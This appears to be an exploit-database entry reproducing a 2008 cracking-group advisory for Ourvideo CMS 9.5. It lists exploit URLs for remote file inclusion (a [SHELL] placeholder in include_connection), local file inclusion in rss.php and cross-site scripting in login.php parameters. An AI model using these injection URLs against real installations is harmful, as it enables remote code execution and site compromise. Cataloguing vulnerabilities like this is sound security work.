header-logo
Suggest Exploit
vendor:
Ourvideo CMS 9.5
by:
CraCkEr
7.5
CVSS
HIGH
Remote File Include, Local File Include, XSS
N/A
CWE
Product Name: Ourvideo CMS 9.5
Affected Version From: Ourvideo CMS 9.5
Affected Version To: Ourvideo CMS 9.5
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: GET
2020

Cracker

Typically used for remotely exploitable vulnerabilities that can lead to system compromise.

Mitigation:

N/A
Source

Exploit-DB raw data:

???????????????????????????????????????????????????????????????????????????????
??                             C r a C k E r                                ??
??          T H E   C R A C K   O F   E T E R N A L   M I G H T             ??
??????????????????????????????????????????????????????????????????????????????

 ?????      From The Ashes and Dust Rises An Unimaginable crack....      ?????
??????????????????????????????????????????????????????????????????????????????
??       [ Remote File Include ]   [ Local File Include ]     [XSS]         ??
??????????????????????????????????????????????????????????????????????????????
:   Author   : CraCkEr                : :                                    :
?   Group    : uNiTeD CraCkiNg ForCE  ? ?                                    ?
?   Script   : Ourvideo CMS 9.5       ? ?         Register Globals :         ?
?   Download : SourceForge.net        ? ?                                    ?
?   Method   : GET                    ? ?          [?] ON   [ ] OFF          ?
?   Critical : High [????????]        ? ?                                    ?
?   Impact   : System access          ? ?                                    ?
? ????????????????????????????????????? ???????????????????????????????????? ?
?                              DALnet #crackers                             ??
??????????????????????????????????????????????????????????????????????????????
:                                                                            :
?  Release Notes:                                                            ?
?  ?????????????                                                             ?
?  Typically used for remotely exploitable vulnerabilities that can lead to  ?
?  system compromise.                                                        ?
?                                                                            ?

??????????????????????????????????????????????????????????????????????????????
??                             Exploit URL's                                ??
??????????????????????????????????????????????????????????????????????????????

[RFI]

http://localhost/path/phpi/edit_top_feature.php?include_connection=[SHELL]
http://localhost/path/phpi/edit_topics_feature.php?include_connection=[SHELL]


[LFI]

http://localhost/path/phpi/rss.php?prefix=[LFI]


[XSS]

http://localhost/path/phpi/login.php?top_page=[XSS]
http://localhost/path/phpi/login.php?end_page=[XSS]



??????????????????????????????????????????????????????????????????????????????
 
Greets:
       The_PitBull, Raz0r, iNs, Sad, CwG GeNiuS

??????????????????????????????????????????????????????????????????????????????
??                              © CraCkEr 2008                              ??
??????????????????????????????????????????????????????????????????????????????

# milw0rm.com [2008-06-23]

Navigation

Suggest Exploit

Services By CQR